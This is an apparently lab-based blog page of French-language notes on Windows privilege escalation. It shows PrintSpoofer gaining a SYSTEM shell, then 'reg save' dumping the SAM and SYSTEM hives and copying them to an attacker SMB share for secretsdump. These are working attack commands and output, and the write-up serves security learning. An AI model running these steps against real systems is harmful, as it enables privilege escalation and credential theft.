Privilege Escalation

SeImpersonatePrivilege Pour ca j’utilise PrintSpoofer.exe
https://juggernaut-sec.com/seimpersonateprivilege/
https://www.hackingarticles.in/windows-privilege-escalation-seimpersonateprivilege/
class="highlight">
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
$ *Evil-WinRM* PS C:\temp> .\PrintSpoofer.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.20348.3453]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>

$ *Evil-WinRM* PS C:\temp> dir


    Directory: C:\temp


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----          6/6/2025   3:07 AM          27136 PrintSpoofer.exe
-a----          6/6/2025   3:07 AM           7168 shell.exe


.*Evil-WinRM* PS C:\temp> .\PrintSpoofer.exe -i -c "c:\temp\shell.exe"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system


SeBackupPrivilege/SeRestorePrivilege Quand on a ces deux privilege la: on peux utiliser deja le : SeRestoreAbuse de xct deja disponible en .exe pour exploiter le SeRestorePrivilege
class="highlight">1
2
3
4
5
6
7
8
9
10
11
12
13
14
$ *Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeBackupPrivilege             Back up files and directories  Enabled
SeRestorePrivilege            Restore files and directories  Enabled
SeShutdownPrivilege           Shut down the system           Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> 

et maintenant si c’est le SeBackupPrivilege alors j’utilise reg save pour enregister les ntds:
class="highlight">1
2
3
4
5
$ *Evil-WinRM* PS C:\temo> reg save hklm\system c:\temo\system.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temo> reg save hklm\sam c:\temo\sam.hive
The operation completed successfully.
*Evil-WinRM* PS C:\temo> 
Ensuite transfere en local pour lire les fichiers importantes avec secretsdump de impacket
Transfert
class="highlight">1
2
3
4
$ impacket-smbserver -smb2support public share
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

$ *Evil-WinRM* PS C:\temo> copy c:\temo\sam.hive \\10.10.14.4\public\
Recently Updated
 Artificial(HackTheBox) - TensorFlow RCE & Backup PrivEsc
 TryHackMe - Shadow Phishing 2
 TryHackMe - Shadow Phishing
 TryHackMe - Ghost Phishing
 Netmon - HacktheBox
Trending Tags
 Hacking CTFs HTB THM Easy Linux Bandit AD Web Windows
© 2025 Abdoulaye Diallo. Some rights reserved.
Using the Chirpy theme for Jekyll.
Trending Tags
 Hacking CTFs HTB THM Easy Linux Bandit AD Web Windows
 
 
A new version of content is available.